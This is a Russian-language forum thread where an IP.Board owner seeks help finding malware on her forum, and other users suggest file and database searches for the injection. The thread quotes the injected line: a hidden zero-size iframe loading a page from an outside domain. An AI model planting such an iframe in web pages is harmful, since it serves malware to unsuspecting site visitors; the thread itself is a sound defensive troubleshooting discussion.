Перейти к контенту
  • 0

Троян Backdoor на форуме


ElenaI

Вопрос

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

 

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже :D

Версия форума 2.2.2, лицензионная

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 60
  • Создана
  • Последний ответ

Лучшие авторы в этом вопросе

Лучшие авторы в этом вопросе

Загружено фотографий

Рекомендуемые сообщения

  • 0
Админка->Изменить HTML шаблоны->skin_global->global_board_header
Ссылка на комментарий
Поделиться на других сайтах

  • 0
Админка->Изменить HTML шаблоны->skin_global->global_board_header

Я же написала, что встраивается эта строка ПОСЛЕ хедера, т. е. после во этой строки: <!-- / End board header -->

Но естественно, указанный Вами файл я несколько раз просмотрела еще до того как тут задать вопрос. :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
обычно меняют индексный файл (index.php)... как вариант можно конечно слить на локальный диск папку skin_cache(если конечно там это прописано) и сделать поиск с заданной строкой по файлам (например при помощи Total Commander) Изменено пользователем Nonamers
Ссылка на комментарий
Поделиться на других сайтах

  • 0

Такие вещи ищются элементарно:

1) Скачай в инете Text Replacer, прога бесплатна и элементарна в управлении.

2) Просканируй этой программой все файлы форума (можно даже бекап БД сканить) на предмет наличия выше упомянутой строки.

3) И будет тебе счастье :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :D
Ссылка на комментарий
Поделиться на других сайтах

  • 0
обычно меняют индексный файл (index.php)... как вариант можно конечно слить на локальный диск папку skin_cache(если конечно там это прописано) и сделать поиск с заданной строкой по файлам (например при помощи Total Commander)

В папке skin_cache последние изменения делались в феврале и апреле. Так что, там этого точно нет.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Злоумышленник смог записать туда что-то, хзначит вполне возможно мог и дату сменить.
Ссылка на комментарий
Поделиться на других сайтах

  • 0
Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :D

А можно подробнее об этом? Дело в том, что файлы форума не менялись уже несклько месяцев, а троян появился только 2 недели назад.

Вот интересно, поможет ли апгрейт форума до версии 2.3.1., или лучше сначала решить проблему на этой версии?

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Если был получен доступ к FTP, то можно записать туда скрипт, кторый подправит в нужную сорону дату редактирования, если хостинг позволяет.

 

Может помочь, может не помочь.

 

В любом случае стоит скачать себе все файлы и поискать document.write и icqspl.jino-net.ru там.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
В первую очередь на index.php посмотреть. Когда-то у меня была похожая фигня, вирус не тронул ничего, кроме index.php
Ссылка на комментарий
Поделиться на других сайтах

  • 0
В первую очередь на index.php посмотреть. Когда-то у меня была похожая фигня, вирус не тронул ничего, кроме index.php

На index.php все чисто, эт я в первую очередь проверила.

 

Такие вещи ищются элементарно:

1) Скачай в инете Text Replacer, прога бесплатна и элементарна в управлении.

2) Просканируй этой программой все файлы форума (можно даже бекап БД сканить) на предмет наличия выше упомянутой строки.

А можно для дилетантов ссылку на бесплатный Text Replacer, который сканит и php файлы в том числе. Я нашла только платный Text Replacer :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

Взяла, но не поняла, чем это может помочь в акетном поиске фрагмента текста? Для того, чтобы посмотреть каждый отдельный php, достаточно блокнота. Или есть какая-то опция?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

Взяла, но не поняла, чем это может помочь в акетном поиске фрагмента текста? Для того, чтобы посмотреть каждый отдельный php, достаточно блокнота. Или есть какая-то опция?

В Total Commander по нажатию Alt-F7 есть возможность поиска текста по файлам с любыми расширениями. Просканируйте директорию форума со всеми файлами на содержание этой строки..

Ссылка на комментарий
Поделиться на других сайтах

  • 0

У меня таоке было. Неправда что менять нужно только в индексном файле. Менять нужно во всех файлах.

Строчку дописывают во все файлы в конце файла (даже в текстовых файлах и в тех было =( ).

Ссылка на комментарий
Поделиться на других сайтах

  • 0
А можно для дилетантов ссылку на бесплатный Text Replacer, который сканит и php файлы в том числе. Я нашла только платный Text Replacer

Специально для дилетантов:

качаем демку проги на оф. сайте

http://www.infortech.ru/prj/open/tr/

Демка от покупной версии отличается лишь тем, что она не сканирует вордовские файлы (у меня не разу в жизни сканировать эти файлы необходимости не возникало :D ), все остальные (html, htm, php, txt …) она прекрасно сканирует, не каких таймеров (типа 30 дней юзаешь, а потом прога блокируется) в демке нет, вобщем отличная вещь, всё на русском и управление элементарное.

 

Возьми Arachonophilia 4.0: http://www.arachnoid.com/arachnophilia/index.html

Для дилетантов эта прога сложнавата.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? :D Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

 

У меня таоке было. Неправда что менять нужно только в индексном файле. Менять нужно во всех файлах.

Строчку дописывают во все файлы в конце файла (даже в текстовых файлах и в тех было =( ).

а что именно у вас было? у моих знакомых дважды сайт компании, на движке Joomla, заразили вирусом, так я им сразу нашла, где "собака порылась" - там действительно все индексные файлы были с припиской вконце, и дата изменения файлов была четкая - как раз день взлома. А тут я прост голову сломала, где искать. Противно до жути и оправдываться перед юзерами уже неловко. ;)

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Вопрос:

Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? :D Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

Ответ:

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :)

 

Вопрос:

у моих знакомых дважды сайт компании, на движке Joomla, заразили вирусом, так я им сразу нашла, где "собака порылась" - там действительно все индексные файлы были с припиской вконце, и дата изменения файлов была четкая - как раз день взлома. А тут я прост голову сломала, где искать. Противно до жути и оправдываться перед юзерами уже неловко. ;)

Ответ:

Сделайте бекап таблицы скинов(ibf_skin_templates) и поищите в нём ещё.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Вопрос:
Спасибо за прогу. Просканила все файлы форума. Строки с icqspl.jino-net.ru не нашла. Что ж теперь делать? :) Сканировать базу? Предупреждение о вирусе вываливается прямо на главной странице форума, то есть, оно не связано с сообщениями.

Ответ:

Не-а, там такой строки не будет скорее всего. Скорее всего это не в файлах скина, а просто document.write во многих файлах :)

На document.write я тоже все файлы просканировала, естественно (читать советы я умею :D ). Но нашлось сие только в 4 файлах, после чего я просканировала новый дистрибутив IPB 2.3.1 - там то же самое, в тех же файлах этот же document.write. Значит, не оно?

Базу данных сейчас гляну, спасибо.

 

Ответ:

Сделайте бекап таблицы скинов(ibf_skin_templates) и поищите в нём ещё.

Там тоже чисто, только что проверила.

Буду рада за любые идеи, ГДЕ искать эту троянску дрянь ;)

Ссылка на комментарий
Поделиться на других сайтах

  • 0
возможно, что сама эта строка закодирована в base_64 например или другим способом
Ссылка на комментарий
Поделиться на других сайтах

  • 0
возможно, что сама эта строка закодирована в base_64 например или другим способом

и как же её искать? :D

вообще, теоретически, где "собирается" вся страница - в каком файле? После шапки форума (после закрытия всех тегов шапки) сразу встраивается эта строка с вирусом, но где-то же - в каком-то файле - идет сборка всех включений?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
не парьтесь, а :D жалко уже Вас ... дайте доступ к фтп какому-нибудь опытному человеку Изменено пользователем Nonamers
Ссылка на комментарий
Поделиться на других сайтах

  • 0
не парьтесь, а ;) жалко уже Вас ... дайте доступ к фтп какому-нибудь опытному человеку

Вообще, раньше мне во всех этих вопросах помогал очень опытный человек, причем, не бесплатно, но он уже 2 месяца не выходит а связь, поэтому приходится разбираться самой :) Проблема в том, что если ты - владелец сайта, то в итоге лучше самому начать во всем разбираться, чем зависеть от других людей, у которых сегодня есть настроение что-то сделать, а на завтра - нет. Даже за деньги - все то же самое... Пэтому и прошу :D Может, кто хоть не даром, но поможет? Вот адрес форума.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Nonamers бесплатно предлагает. И я присоединяюсь.

 

P.S. Возьмите с хостинга ./sources/classes/class_display.php, заархивируйте и выложите, он за вывод отвечает.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
можете ничего не выкладывать, а просто постучаться ко мне в аську (она в профиле) :D
Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.